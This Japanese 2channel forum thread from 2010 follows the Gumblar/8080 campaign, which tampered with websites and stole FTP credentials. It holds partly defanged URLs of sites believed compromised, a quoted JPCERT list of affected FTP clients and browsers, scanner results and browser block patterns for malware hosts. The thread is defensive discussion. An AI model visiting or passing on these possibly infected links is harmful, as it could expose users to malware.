618 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:21:59
>>612-615
ヒント:同人板で大騒ぎ

619 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:24:38
>>617
やってると思う。 >>603 のexe、WinSock2フックしとる。

620 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:26:11
>>618
やられてる人は多いだろうね。普通の人はそれほど縁がないJavaも
お絵描き掲示板では必要だし。んで古いJavaそのままみたいな。

621 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:33:34
>>619
そうか、ありがとん

622 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:46:28
>>618
あそこの連中は8080が一般ニュースになって
世間が騒いでる真っ最中でさえ

「以前感染警告や感染告知出したら質問メールが数通来た
だから今回告知出すのマンドクセ」

とか言い出してたからなw
それが自分の身にダイレクトに降りかかるとわかった途端
一転してパニックモードですよ。

GENOの時も思ったが、あそこは本当にクズの集まり。

623 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:49:07
あとSSL非対応だから問題があるような書き込みも多いけど違うだろ
保存してあるパスワードが盗まれることが問題なんだから
もちろん安全性は高まるけど


624 :45:2010/02/01(月) 18:54:59
>>593
めるぽ
whoisからめるぽ

625 :名無しさん@お腹いっぱい。:2010/02/01(月) 19:02:27
借りてる鯖がそもそもFTP以外使えない


626 :45:2010/02/01(月) 19:24:10
>>596
whoisからめるぽ
海外鯖っぽいので無視される鴨。。。

627 :名無しさん@お腹いっぱい。:2010/02/01(月) 19:28:59
規制

628 :名無しさん@お腹いっぱい。:2010/02/01(月) 19:55:30
最新の奴はどのアンチウィルスソフトでも引っかからないよな。って当り前だけど。
頻繁に更新するもんだから全然役に立たねぇー。
ウィルスソフトさえ更新しとけば大丈夫とか思ってる奴は確実にやられるな。


629 :名無しさん@お腹いっぱい。:2010/02/01(月) 19:58:54
引っかからないのはスクリプトだろ?
そのほかの段階で防御可能なら感染の問題はない

630 :名無しさん@お腹いっぱい。:2010/02/01(月) 20:02:35
各アプリ(Java、PDF、etc.)を常に最新にしておくことが最も重要。
Adobeがゼロデイをしばらく放置したおかげでひどいことになったけど、
現時点では防げるからね。
アンチウイルスだのFTPクライアントは何がいいだのは二の次だよ。

631 :名無しさん@お腹いっぱい。:2010/02/01(月) 20:07:55
その通りだよ。
感染前の対策が出来ていれば感染後のことなんて騒ぐ事じゃない。
新たな脆弱性なんて持ち出したらキリがないしな。

632 :名無しさん@お腹いっぱい。:2010/02/01(月) 20:08:18
そんなことは知ってるだろ
アンチウイルスさえ更新しとけば大丈夫とか思ってる人の話だろ
でも常に最新に出来ないような場合もあるんだよね

633 :名無しさん@お腹いっぱい。:2010/02/01(月) 20:09:40
>>629
最後ウィルス落としてくるじゃん。
あれもアンチウィルスソフトだと引っかからないな。
引っかかるようになると引っかからないもんに変身する。


634 :名無しさん@お腹いっぱい。:2010/02/01(月) 20:13:24
>>633
当たり前だがソフトによるよ
脆弱性を攻撃する際に検知するやつもあるし

635 :45:2010/02/01(月) 20:18:14
>>604
めるぽ

636 :名無しさん@お腹いっぱい。:2010/02/01(月) 20:33:32
>>630
> 各アプリ(Java、PDF、etc.)を常に最新にしておくことが最も重要。
> Adobeがゼロデイをしばらく放置したおかげでひどいことになったけど、

当時最新を心がけている人で、readerのJavascriptを切ってないような人は
少なかったんじゃないかなぁ
感染してる人はadobeゼロデイ以前の問題のような気がする

637 :名無しさん@お腹いっぱい。:2010/02/01(月) 20:41:04
ブラックリストフレームワーク()とかいう誰も使わないステキ機能もあったしな>Adobe

638 :名無しさん@お腹いっぱい。:2010/02/01(月) 21:59:24
tp://www●deviantart●com/
やばい??

639 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:02:29
>>638
GumblarChecker 2だと検出されなかったけど

640 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:14:02
deviantartが感染してたら大惨事だ

641 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:28:39
tp://www●.horimasa.co●.jp/?mono/dvd/-/detail/=/cid=iptd545/
上記のサイトをaguseで調べたら可能性ありと出たんだが、どうかな?

642 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:30:30
>>639-640
だよな、めんご


643 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:30:39
>>641
チェック対象から3件検出されました

644 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:48:43
>>643
ありがとうございます。

645 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:52:28
>>641
>>568の一番上と同じじゃね?

646 :名無しさん@お腹いっぱい。:2010/02/01(月) 22:54:03
horimasa本家もやられてるなあ

647 :名無しさん@お腹いっぱい。:2010/02/01(月) 23:07:47
これ変更のスピードを圧倒的に早くすると確実に対応出来ないよな。
感染しちゃってるけど検知されないまま残る奴も居る訳だ。
っていうか多分現時点でそういう奴も居るんだろうな。

ゼロデイで仕掛けられると脅威だな。


648 :名無しさん@お腹いっぱい。:2010/02/01(月) 23:32:31
Adobeがパッチ出すのを渋ったせいでこのありさまだよw

649 :名無しさん@お腹いっぱい。:2010/02/01(月) 23:52:42
>605
IP変えて踏んでる?

同じIPだと2回目以降はダウンロードされないとかってあったはず




650 :名無しさん@お腹いっぱい。:2010/02/01(月) 23:59:56
FFFTPの件はライフハッカー(笑)にも載ったのか
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
そのへんも拡大要因かな
しかし迷惑な話だ

651 :名無しさん@お腹いっぱい。:2010/02/02(火) 00:10:02
avastが最新型(ru:x/eval)に対応
JS:Illredir-F [Trj]
やっと来た…

652 :名無しさん@お腹いっぱい。:2010/02/02(火) 00:15:46
gnomeさんのとこで反応が出てうざい(苦笑@avast

653 :名無しさん@お腹いっぱい。:2010/02/02(火) 00:16:46
>>652
しょうがないから除外設定したよw

654 :名無しさん@お腹いっぱい。:2010/02/02(火) 00:50:06
>>647
コードの進化(毎日絶賛進化中)が止まってるみたいだから
新しい脆弱性攻撃の仕込みをやってるのかもしれん。

ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2122
コレとか

655 :名無しさん@お腹いっぱい。:2010/02/02(火) 00:57:52
それはpatch出てるから今更感がある

656 :名無しさん@お腹いっぱい。:2010/02/02(火) 01:06:31
どちらにしろMSIE,Adobe製品の脆弱性を使うだろうね
穴多い上に対応が遅いし

657 :名無しさん@お腹いっぱい。:2010/02/02(火) 01:23:33
MSは速いだろ

658 :名無しさん@お腹いっぱい。:2010/02/02(火) 01:30:01
更新しない人が多いってだけだよな

659 :名無しさん@お腹いっぱい。:2010/02/02(火) 02:07:23
【Dr.Web anti-virus link checker】
ttps://addons.mozilla.jp/firefox/details/938
陥落サイトを全部検知しやがる・・・

660 :名無しさん@お腹いっぱい。:2010/02/02(火) 02:16:44
>>659
どこがじゃwホリマサだめだったぞ

661 :名無しさん@お腹いっぱい。:2010/02/02(火) 02:19:03
>>659
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

662 :名無しさん@お腹いっぱい。:2010/02/02(火) 02:34:54
Firefox以外のブラウザでも第三者スクリプトのみを簡単にブロックする方法はないかな?

663 :659:2010/02/02(火) 02:36:24
>>660
ttp://lovestube.com/up/src/up3447.jpg

664 :名無しさん@お腹いっぱい。:2010/02/02(火) 02:37:12
IEならインターネットゾーンのレベルを高にして必要な物だけ信頼済みサイトにドメインを追加するとか

665 :名無しさん@お腹いっぱい。:2010/02/02(火) 02:45:53
koko.konotan●com/bustup/
www.to-an●jp/content/
kinyu64.choicash●com/
www.health-insurance-101●com/

新しい改ざんはどれもコードの埋め込みに失敗してない?
この状態でスクリプトは動くのかなぁ。

666 :名無しさん@お腹いっぱい。:2010/02/02(火) 03:20:44
>>663
641は、自分のだと検出されないんだが・・・

667 :名無しさん@お腹いっぱい。:2010/02/02(火) 08:28:32
>>647
ヒューリスティックであやしい挙動のスクリプト全部とめるってのも手だな
まあ誤検知もあるだろうけど

668 :名無しさん@お腹いっぱい。:2010/02/02(火) 08:29:48
>>656
MSはその中じゃ一番早いだろ

ゼロデイに使われる危険度が緊急のアップデートはかなり早い
firefoxとかlinux系より早いよ

669 :名無しさん@お腹いっぱい。:2010/02/02(火) 08:31:05
>firefoxとかlinux系より早いよ
いや、それはないw
散々放置の前科持ちだから

670 :名無しさん@お腹いっぱい。:2010/02/02(火) 08:33:53
前科はともかく、いまはMSが一番早いだろ
firefoxやlinuxは、開発社サイトやメーリングリストにソースコードレベルのパッチが投稿されるのは早いが、
正式にアップデートが提供されるのはそこそこ時間がかかる

自分でソースコードにパッチ当ててコンパイルする人じゃなければ時間かかるな

671 :名無しさん@お腹いっぱい。:2010/02/02(火) 08:42:46
何を必死になってるの?

672 :名無しさん@お腹いっぱい。:2010/02/02(火) 09:52:30
>>670
いや遅いよ
先月の緊急パッチだって事前に検証が進んでいたからあのタイミングで出せただけで
ゼロデイだったなら緊急配布は不可能だし2月どころか3月のパッチにも間に合うか微妙な感じ

673 :名無しさん@お腹いっぱい。:2010/02/02(火) 10:04:49
>>665
陶芸教室のは失敗してないんじゃね。
他のは変なところでタグが切れてるけど、ページは表示されるし
scriptタグもちゃんと書かれてるから、実行されそうだが…

674 :名無しさん@お腹いっぱい。:2010/02/02(火) 10:27:43
トレンドがGumblar対策で売ってるけど本当に止められるのか?

日本に出回っているソフトで対策ができるかなと思うのはカスペ以外思い浮かばないのですが?

675 :名無しさん@お腹いっぱい。:2010/02/02(火) 10:33:26
カスペ?
なんで?
ノートンなら最初から防御できたよ

676 :名無しさん@お腹いっぱい。:2010/02/02(火) 10:36:31
いつものようにvirustotalでスクリプトだけスキャンして判定してるんだろ

677 :名無しさん@お腹いっぱい。:2010/02/02(火) 13:17:14
ttp://www.odnir.com/cgi/src/nup44340.jpg
ttp://www.odnir.com/cgi/src/nup44341.jpg

678 :名無しさん@お腹いっぱい。:2010/02/02(火) 13:30:47
www●eco-rt●jp

殆どのファイルにコード書かれてた…

679 :名無しさん@お腹いっぱい。:2010/02/02(火) 13:53:21
ttp://www.oshiete-kun.net/archives/2010/02/ffftp.html

あーあ。。。

680 :名無しさん@お腹いっぱい。:2010/02/02(火) 14:12:47
>>674
一応2010なら変なアドレスとの通信は止まるみたいだけど、
8080本体を完全スルーした前科ありなので危険。
♪サクサク感染〜 になりかねない

681 :名無しさん@お腹いっぱい。:2010/02/02(火) 15:04:19
新しい Avira エンジンの更新が実行されました。
新しいエンジンのバージョン番号 :
AV7 7.9.1.156 / AV8/9 8.2.1.156
変更内容 :
- 修正 : 誤検出
HTML/Spoofing.Gen
HTML/Silly.Gen
HTML/Malicious.PDF.Gen
HTML/ADODB.Exploit.Gen
HTML/Crypted.Gen
HTML/Infected.WebPage.Gen
HEUR/HTML.Malware

来たかな

682 :名無しさん@お腹いっぱい。:2010/02/02(火) 15:23:39
>>679
ひどいな

683 :45:2010/02/02(火) 17:00:13
>>665,>>678
めるぽしたり、whoisからめるぽしたり。

684 :名無しさん@お腹いっぱい。:2010/02/02(火) 17:58:46
>>682
ネトランだからな…

685 :名無しさん@お腹いっぱい。:2010/02/02(火) 18:00:44
>>683
いつもありがとうございます。

686 :名無しさん@お腹いっぱい。:2010/02/02(火) 18:01:55
どこがひどいの

687 :名無しさん@お腹いっぱい。:2010/02/02(火) 18:39:28
www●eco-rt●jp

こいつの先のスクリプトも失敗してないか?
俺はjavaに詳しくないからよくわからんが
文字コードを区切ってるsplitってちゃんとした区切り文字入ってないことないか?ずっとそうだけど。
それと文字コードを文字に変換してる所も以前は+4じゃ上手く変換されんな。

688 :687:2010/02/02(火) 18:41:29
スマソ。
×→それと文字コードを文字に変換してる所も以前は+4じゃ上手く変換されんな。
○→それと文字コードを文字に変換してる所は+4じゃ上手く変換されんな。

689 :名無しさん@お腹いっぱい。:2010/02/02(火) 19:12:19
>>678
コード消えてね?見当たらんのだが

690 :名無しさん@お腹いっぱい。:2010/02/02(火) 19:29:45
16:33 の魚拓
http://megalodon●jp/2010-0202-1633-50/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Eeco%2Drt%2Ejp%2Findex%2Ehtml
ぐぐったら出てきた。眠いから後は誰か宜しく。

691 :名無しさん@お腹いっぱい。:2010/02/02(火) 20:26:25
>>690をaguseで開いたら俺のavastたんが火を吹いたんだが


692 :名無しさん@お腹いっぱい。:2010/02/02(火) 20:32:08
ソース見る限りエンコードしてるっぽいから誤検出だと思う

693 :名無しさん@お腹いっぱい。:2010/02/02(火) 20:58:47
>>692
やっぱ誤検出ですよね。よかた
ありがとうございます
魚拓をaguseで踏むようなチキンにあの警報音はきつい

694 :名無しさん@お腹いっぱい。:2010/02/02(火) 21:51:26
>>132
お昼に電凸
現状無害
一応完了

695 :名無しさん@お腹いっぱい。:2010/02/02(火) 22:52:03
にしても何でスクリプト失敗してるんだろうな。
たまたま失敗してるのか
意図的に失敗させてるのか
誰かに書き換えられたのか
どれだろうな。

結構いい所で失敗してるぞ。
誰か書き換えてたりしてな。

696 :名無しさん@お腹いっぱい。:2010/02/02(火) 23:11:58
もし任天堂やソニーのHPがGumblar感染発覚したら大騒動になりそう・・・

697 :名無しさん@お腹いっぱい。:2010/02/02(火) 23:39:28
色々な感染告知を見て思うんだが、こういうのってわざと

(1)index.htmlな告知ページ
(2)JavaScript無効だと見れない告知
(3)PDFの告知
(4)告知のリンクがFlashの中

index.htmlな告知ページが改ざんされてたのは、さすがにキレたけど
おまいらはどの辺まで許容範囲?






698 :名無しさん@お腹いっぱい。:2010/02/02(火) 23:53:50
今の状況じゃ告知されてりゃマシなほうじゃね

699 :名無しさん@お腹いっぱい。:2010/02/02(火) 23:57:24
こんなウイルスを作るやつが生まれてきたのが許せない

700 :名無しさん@お腹いっぱい。:2010/02/02(火) 23:59:15
すいません

701 :名無しさん@お腹いっぱい。:2010/02/03(水) 00:03:05
>>699
そうだよな
ウイルス作ったやつは公開処刑されるべき
国を揺るがしかねないからテロリストと同類だしな

702 :名無しさん@お腹いっぱい。:2010/02/03(水) 00:06:39
一回、馬鹿でかい損害賠償とかあればね・・・

703 :名無しさん@お腹いっぱい。:2010/02/03(水) 00:27:13
>>702
損害賠償請求されるといろいろ面倒だから今回は破壊工作してこないんじゃないかな

704 :名無しさん@お腹いっぱい。:2010/02/03(水) 00:31:44
告知ないほうが困る
だから、告知してるだけマシだ〜

705 :名無しさん@お腹いっぱい。:2010/02/03(水) 02:29:48
Apple関係のプログラム(updateとか)をアンインスコしたが、Quicktimeは除去し忘れてた。
この状態で踏んだら「このコンピュータにはQuicktimeが見つけられませんでした」
のようなメッセージが無限に出てきたんだけども、大丈夫かな。

  www●geocities●jp/honeybee_site/index●htm

706 :名無しさん@お腹いっぱい。:2010/02/03(水) 03:19:50
ここは質問スレじゃねーぞ

ざっと見た感じ何も無いと思うが

707 :名無しさん@お腹いっぱい。:2010/02/03(水) 04:45:05
>>705
埋め込みMIDIを鳴らそうとしているだけだ。馬鹿たれ。
何でもかんでもウイルスだと疑う前にページのソースぐらい確認しろ。

708 :名無しさん@お腹いっぱい。:2010/02/03(水) 08:43:27
>>701
実際今回のウィルスは超国家的インターネット絶滅作戦の一環だと思う

709 :名無しさん@お腹いっぱい。:2010/02/03(水) 08:45:54
妄想厨は死んだほうが良いと思う

710 :名無しさん@お腹いっぱい。:2010/02/03(水) 10:11:52
宿泊所紹介サイトが改ざん、閲覧でウイルス感染のおそれ - 公立学校共済組合
http://www.security-next.com/011944.html

保険代理店のサイトが改ざん - 閲覧者にウイルス感染のおそれ
http://www.security-next.com/011945.html

名古屋のリフォーム事業者のサイトが改ざん - 閲覧で「Gumblar」亜種感染のおそれ
http://www.security-next.com/011955.html

美容ポータル「スタービューティー」が「Gumblar亜種」による改ざん
http://www.security-next.com/011959.html

奈良女子大運営の情報サイトが「Gumblar」亜種で改ざん - キャッシュから問題が判明
http://www.security-next.com/011959.html

711 :名無しさん@お腹いっぱい。:2010/02/03(水) 10:46:03
亜種改竄か。

712 :名無しさん@お腹いっぱい。:2010/02/03(水) 11:41:30
新参ですまん。
マルウェアを感染させて挙動を調べたいとき用にAPIフックするツールを書いてるんだけどめんどくさい。
おまいら解析するとき、何かフリーのツールつかってんの?


713 :名無しさん@お腹いっぱい。:2010/02/03(水) 12:02:13
p://ding●.hichigosan●com/excessive-perspiration-japan/
p://dooon●konrei●org/foreign-exchange-japan/

まだー?


714 :名無しさん@お腹いっぱい。:2010/02/03(水) 15:05:43
JPCERT/CC では、以下の FTP クライアントにてマル
ウエアによるアカウント窃取、および外部サーバへのアカウント情報の送信を
確認しました。

- ALFTP 5.2 beta1
- BulletPloof FTP Client 2009.72.0.64
- EmFTP 2.02.2
- FFFTP 1.96d
- FileZilla 3.3.1
- FlashFXP 3.6
- Frigate 3.36
- FTP Commander 8
- FTP Navigator 7.77
- FTP Now 2.6.93
- FTP Rush 1.1b
- SmartFTP 4.0.1072.0
- Total Commander 7.50a
- UltraFXP 1.07
- WinSCP 4.2.5

上記に加えて、以下の Web ブラウザのアカウント管理機能を用いて保存され
ている情報をマルウエアが窃取し、外部サーバに送信している事を確認しまし
た。

- Microsoft社 Internet Explorer 6
(Internet Explore 7 および 8 ではアカウント窃取は確認されておりません)
- Opera社 Opera 10.10

715 :名無しさん@お腹いっぱい。:2010/02/03(水) 15:13:12
opera-!!!!

716 :名無しさん@お腹いっぱい。:2010/02/03(水) 15:14:06
>>714
ほとんどダメポってことねw

717 :名無しさん@お腹いっぱい。:2010/02/03(水) 15:34:53
>>714
もうFTPって規約を使うなということか…。
あとIE6のオートコンプリートw

IE6なんか早く捨てればいいのに、官庁の電子入札システムは
IE6以外じゃ動作しないとかなんとか…

718 :名無しさん@お腹いっぱい。:2010/02/03(水) 16:49:43
つかWebスペースを提供してくれる会社でFTP駄目(代わりにCMS使え)ってトコ無いの?
自分が調べた限りでは無料の会社はFTP使えってトコがほとんどだったような…

あ、ブログとかは別ね。


719 :名無しさん@お腹いっぱい。:2010/02/03(水) 16:52:42
フリーライダーの厚かましさはホント底無しだな。

720 :名無しさん@お腹いっぱい。:2010/02/03(水) 16:56:52
昨日チカッパからFTPS対応したってメール来た。
ttp://chicappa.jp/?mode=info&state=info&page=1&id=492#492

ロリポはとりあえず放置で行くみたい。

721 :名無しさん@お腹いっぱい。:2010/02/03(水) 16:58:49
●全世界にウ○ツキ評価を公表している機関の会議に参加する
10万人以上の従業員を有しているAIG(アメリカンインターナショナルグループ:
アメリカ合衆国ニューヨークに本拠を置く保険会社)Europeの
おそらく社内セキュリティ担当かなんかの人
http://www.virusbtn.com/conference/vb2009/programme/index

Martin Overton さん

2009年9月ジュネーブ会議にて

722 :名無しさん@お腹いっぱい。:2010/02/03(水) 16:59:49
CMSでもリスクに差はほとんどないでしょ?
個人的には、近いうちにCMSのコンテンツ改竄に踏み切る気がしてるw
サーバー側はポートの制限がしにくいし
話は少し違うけどCMS自体に重大なセキュリティホールが見つかったら、FTPよりリスクは大きいし
これはFTPサーバーにセキュリティホールが見つかる事と同等かもしれないけど
性質上CMSの方がセキュリティホールが見つかりやすい気がする

723 :もとい:2010/02/03(水) 17:02:08
●全世界にウ○ツキ評価を公表している機関の会議に参加する
10万人以上の従業員を有しているAIG(アメリカンインターナショナルグループ:
アメリカ合衆国ニューヨークに本拠を置く保険会社)Europeの
おそらく社内セキュリティ担当かなんかの人
http://www.virusbtn.com/conference/vb2009/programme/index

Pascal Lointier さん

2009年9月ジュネーブ会議にて

724 :名無しさん@お腹いっぱい。:2010/02/03(水) 17:37:48
フリーのスペースは基本放置でいくんだろうなぁ

725 :名無しさん@お腹いっぱい。:2010/02/03(水) 17:58:40
>>718
GeoCitiesがCMSだった気が。
んで文字コードがEUCでしょっちゅう化けた気が。

726 :名無しさん@お腹いっぱい。:2010/02/03(水) 18:02:00
>>722
そんなん昔からあるべ。SQLインジェクションとやること大して変わらんし
WordPressとかしょっちゅうやられ(て頻繁にバージョンアップし)てる。

727 :名無しさん@お腹いっぱい。:2010/02/03(水) 18:30:50
>>714
Firefox圧勝だな

728 :名無しさん@お腹いっぱい。:2010/02/03(水) 18:33:50
Firefoxは2007年からのパスワード漏洩の脆弱性を放置しているがな

729 :名無しさん@お腹いっぱい。:2010/02/03(水) 18:33:58
>>725
スレ違い、むしろ板違いクレクレの相手しないでほしい

730 :名無しさん@お腹いっぱい。:2010/02/03(水) 19:22:43
>>714
だからマスタパスワード入れろとあれほど

731 :名無しさん@お腹いっぱい。:2010/02/03(水) 19:28:03
ひょっとしてwebの書き換え止まった?


732 :名無しさん@お腹いっぱい。:2010/02/03(水) 19:33:57
16 名前: 砂鉄(富山県)[sage] 投稿日:2010/02/03(水) 17:07:11.57 ID:AJ6wgOKE
operaのコンテンツブロックにhttp://*.ru*を入れればガンブラァを防げるという話を聞いたことがあるな

733 :名無しさん@お腹いっぱい。:2010/02/03(水) 19:48:49
FirefoxでFireFTPこれ最強

734 :名無しさん@お腹いっぱい。:2010/02/03(水) 19:57:13
>>732
どこのコピペか知らんが、コンテンツブロックに入れるなら *:8080/* の方がいい。

735 :名無しさん@お腹いっぱい。:2010/02/03(水) 20:59:46
●全世界にウ○ツキ評価を公表している機関の
会議に参加するシマンテックの面々
http://www.virusbtn.com/conference/vb2009/programme/index
Sumesh Jaiswal
Carey Nachenberg
Vijay Seshadri
Zulfikar Ramzan
Candid Wueest

2009年9月ジュネーブ会議にて

736 :名無しさん@お腹いっぱい。:2010/02/03(水) 21:50:49
IEの情報を盗んで被害が出るまでは対応策が出ないということは
今までは人のパソコンの中身をこそっとみてウヒヒと笑って個人利用していた
可能性もあり?

737 :名無しさん@お腹いっぱい。:2010/02/03(水) 22:00:34
>>718
fc2がCMSとFTP両用

738 :737:2010/02/03(水) 22:02:07
>>729
あ、ごめん。下まで読まずにレスってしまった。

739 :名無しさん@お腹いっぱい。:2010/02/03(水) 22:42:35
>>736
ないとはいえないね

740 :名無しさん@お腹いっぱい。:2010/02/03(水) 22:51:40
p://www●naughty-skt●com/

再改竄。

741 :名無しさん@お腹いっぱい。:2010/02/03(水) 23:03:02
>>714
DreamweaverのFTPは安全か
SFTPだし

742 :名無しさん@お腹いっぱい。:2010/02/03(水) 23:35:33
また火狐野朗がなんかいっちゃってんのか
そんなもんなんでもないとはいえないってなるわ

743 :名無しさん@お腹いっぱい。:2010/02/03(水) 23:40:26
>>741
相手サーバーがSFTPならな

744 :名無しさん@お腹いっぱい。:2010/02/03(水) 23:42:06
>>742
疲れてるならとっとと寝ろよ

745 :名無しさん@お腹いっぱい。:2010/02/03(水) 23:56:58
某ブログの転載の転載。規制中らしいよ


>某掲示板に書こうと思ったら、巻き込み規制を喰らっていたので・・・

>・海保エミリ(公式サイト)
>tp://emilykaiho●com/en/home●html
>tp://emilykaiho●com/home●html
>※stardustの連鎖と思われます

某ブログつながりで…記事にされてるOperaですけどマスターパスワード掛けとけば一応は安心じゃないですかね?

746 :名無しさん@お腹いっぱい。:2010/02/04(木) 00:03:38
そもそも引っかかってからの話とか
気にするな
ftpはともかく

747 :名無しさん@お腹いっぱい。:2010/02/04(木) 00:16:51
tcnweb●ne●jp/~pinkysky/
www●eonet●ne●jp/~inoue-clinic/
www●fujiya-ryokan●jp/index●html
www●popchai●jp/


748 :名無しさん@お腹いっぱい。:2010/02/04(木) 00:24:29
ゴーギャン展のHP改ざん ガンブラー亜種

東京国立近代美術館で昨年開催された「ゴーギャン展2009」の公式ホームページが、
「ガンブラー」と呼ばれるコンピューターウイルスの亜種に感染し、不正に改ざんされていたことが、3日分かった。

同展を主催したNHKなどによると、不正に改ざんされた期間は、今年1月3日から2月1日まで。
この期間に延べ約1700件の閲覧があり、アクセスした人のパソコンにウイルス感染のおそれがあるという。

ttp://www.nishinippon.co.jp/nnp/item/150424

749 :名無しさん@お腹いっぱい。:2010/02/04(木) 00:42:13
>>748
ずいぶんと訪問者が少ないサイトなんだな・・

750 :45:2010/02/04(木) 01:00:03 ?2BP(1236)
>>740
ろりぽ

>>745
whoisからめるぽ

751 :45:2010/02/04(木) 01:04:33 ?2BP(1236)
>>747
下二つはさっきめるぽとwhoisからめるぽしてますた。
残件上二つ。

752 :45:2010/02/04(木) 01:58:23 ?2BP(1236)
>>747上二つ。
whoisからめるぽ
めるぽ

753 :名無しさん@お腹いっぱい。:2010/02/04(木) 02:06:33
//godiego●net/
すみませんここトロイの木馬が検出されたんですが
ガンブラーにかかってますか?

754 :名無しさん@お腹いっぱい。:2010/02/04(木) 02:08:51
>>753
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fgodiego.net&x=0&y=0

755 :名無しさん@お腹いっぱい。:2010/02/04(木) 02:13:02
//godiego●net/common/flash.js
がやられてる

756 :名無しさん@お腹いっぱい。:2010/02/04(木) 02:13:03
>>754
ありがとうございましたやっぱりかかってるみたいですね 


757 :名無しさん@お腹いっぱい。:2010/02/04(木) 02:13:44
>>755
ありがとうございます。
ゴダイゴすれみたら1月18日にトロイが出たって書いてた人が
いたので・・・

758 :名無しさん@お腹いっぱい。:2010/02/04(木) 02:20:06
>>753
>>16
・Gumblar Checker 2
移転先URL→ ttp://gumblar.s1.dynamitelife.net/

>>745
ttp://www.stardust.co.jp/profile/kaihoemily.html
「前科あり」だから、問い合わせフォームから凸しといたw

759 :45:2010/02/04(木) 03:49:12 ?2BP(1236)
>>753
whoisからめるぽ

>>758
乙です。

見落とし
>>694
乙乙です。

760 :名無しさん@お腹いっぱい。:2010/02/04(木) 11:09:51
whoisカラめるぽ?
何語だよ・・・

761 :誤爆した:2010/02/04(木) 11:11:35
ロリポもFTPSに対応予定らしい。
現状は.ftpaccessを置いて対応しれだって。

ttp://lolipop.jp/gumblar/
ttp://heteml.jp/gumblar/

762 :名無しさん@お腹いっぱい。:2010/02/04(木) 11:11:54
>>760
お前ここは初めてか?力抜けよw

763 :名無しさん@お腹いっぱい。:2010/02/04(木) 11:40:28
ユーザ名とパスワード盗まれてる時点でFTPoverSSLは意味ないんじゃないの?

764 :名無しさん@お腹いっぱい。:2010/02/04(木) 12:00:24
自端末で改竄するんだよね?
.ftpaccessでIP制限だと無意味だよね


765 :名無しさん@お腹いっぱい。:2010/02/04(木) 12:56:49
こっそりぬるぽしてみる

766 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:09:15
>>765
ガッ!!

767 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:29:51
>>714
予想はしてたが、主要ソフト壊滅状態か。NextFTPも多分アウツじゃない?
FFFTPだけ悪者にされてカワイソス
でもブログやニュース記事には残るわけで・・・
何がアルファブロガーだ、ロクに考えもせず糞記事撒き散らしやがってライフハッカーが

--------

250 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 17:26:00
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです : ライフハッカー[日本版], 仕事も生活も上手くこなすライフハック情報満載のブログ・メディア
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html

> 「UnderForge of Lack」では、消去すべきレジストリを記載してありますので、『FFFTP』のユーザーさんは、参考にして下さい。
ttp://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/

> 代わりのFTPソフトとしては、『ALFTP』、『WinSCP』、有料ですが『NextFTP』(3ヶ月間の無料試用期間あり)などをどうぞ。

--------

書くネタが出来て良かったね、さっさと記事書けよアルファブロガーさん

768 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:32:47
FFFTPだけが悪いような書き方を最初にした所が悪い。
そしてFFFTP作者もまんまと騙されてアホみたい。

769 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:36:18
ライフハッカーはレベル低いぞ
2ちゃんの平均より低いだろ
子供のいたずら書き程度だ

770 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:37:04
FFFTP作者は騙されたってより責任を取りたくないから
ちゃんと他に移行してって言ったもんっていう
証拠を示しただけだろ

771 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:44:26
>>768
FFFTPが対象になってるって記事を
勝手にFFFTPだけと読み取ったんじゃねえの
お前みたいなおっちょこちょいが

772 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:45:34
責任なんてとる必要無いだろww
FFFTPに問題がありパスワード等が漏れた訳では無い

それを言うならウイルスが実行出来てしまうようなOSを作ったマイクロソフト(ry

Adobe,Sunかわいそす

773 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:46:10
>>771
知らないやつは黙ってろw

774 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:46:52
>>772
単に問い合わせが多かったんだろ

775 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:47:52
>>773
おっちょこちょいは黙ってろ

776 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:49:52
今日も元気でよろしい。

777 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:50:04
どう考えてもウイルスの作者が責任をとるべきだろ
これはまず無理

778 :名無しさん@お腹いっぱい。:2010/02/04(木) 13:56:04
何で作者は捕まらないのかな…。

779 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:07:09
技術の進歩のため

780 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:09:55
独自のブロードバンドサプライヤーとして自分ちで立ち上げているからじゃね
もう今時はね

781 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:25:33
www●seihuu●com
ソース見ただけじゃ改ざんされてるか分からん…。
avastがなぜか検出する

782 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:26:07
銃は悪くない。使う人が悪い。
ウィルスは悪くない。DL実行できてしまうアプリが悪い。

783 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:32:01
>>782
言いたいことを例えるための例と言いたいことが矛盾。

銃は悪くない。銃で犯罪を行うことが出切る人間が悪い。
ウィルスは悪くない。DL実行できてしまうアプリが悪い。

